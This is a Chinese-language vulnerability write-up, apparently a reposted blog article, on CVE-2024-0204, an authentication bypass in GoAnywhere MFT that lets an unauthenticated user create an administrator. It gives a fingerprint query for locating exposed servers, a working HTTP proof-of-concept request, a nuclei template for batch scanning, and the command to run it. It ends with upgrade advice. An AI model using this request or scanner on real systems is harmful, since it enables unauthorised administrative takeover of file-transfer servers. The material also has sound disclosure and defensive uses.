免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
Goanywhere MFT 未授权创建管理员漏洞
02
—
漏洞影响
影响版本
6.x >= 6.0.1
7.x < 7.4.1
03
—
漏洞描述
GoAnywhere MFT是一个安全的文件传输软件解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。旨在通过其集中控制和广泛的安全设置,为组织提供一个高效、安全的文件传输环境。该漏洞存在于GoAnywhere MFT 中,是一个身份认证绕过漏洞。未经身份验证的远程攻击者可利用该漏洞,绕过身份认证,通过管理门户创建管理员用户。
漏洞分析可以参考博客
https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/
04
—
body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
05
—
漏洞复现
POC数据包如下
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
如果响应内容中包含关键字
Create an administrator account
则存在漏洞
由于是get请求,直接使用浏览器可以直观看到有个创建用户的界面,可以直接创建管理员用户。
漏洞复现成功
06
—
漏洞批量扫描脚本
nuclei poc文件内容如下
id: CVE-2024-0204
info:
name: Fortra GoAnywhere MFT - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
reference:
- https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml
- https://www.fortra.com/security/advisory/fi-2024-001
- https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py
- https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0204
cwe-id: CWE-425
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 || html:InvalidBrowser.xhtml
tags: cve,cve2024,auth-bypass,goanywhere
http:
- method: GET
path:
- "{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Create an administrator account"
- "goanywhere"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204cf4124e1cf41e749682dfd2780edee610ad177d8f87b7e5adfaad7e1deaf55602200b1c67b0a6ee6be3e4fc0b8a89ae9672ae6995e4dce26b247f1881f6b4954312:922c64590222798bb761d5b6d8e72950
运行POC
nuclei.exe -l data/GoAnywhere-MFT.txt -t mypoc/cve/CVE-2024-0204.yaml
github上也有python扫描脚本,喜欢python的可以下载使用
https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py
07
—
修复建议
升级到最新版本。
08
—
原文始发于微信公众号(AI与网安):CVE-2024-0204
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论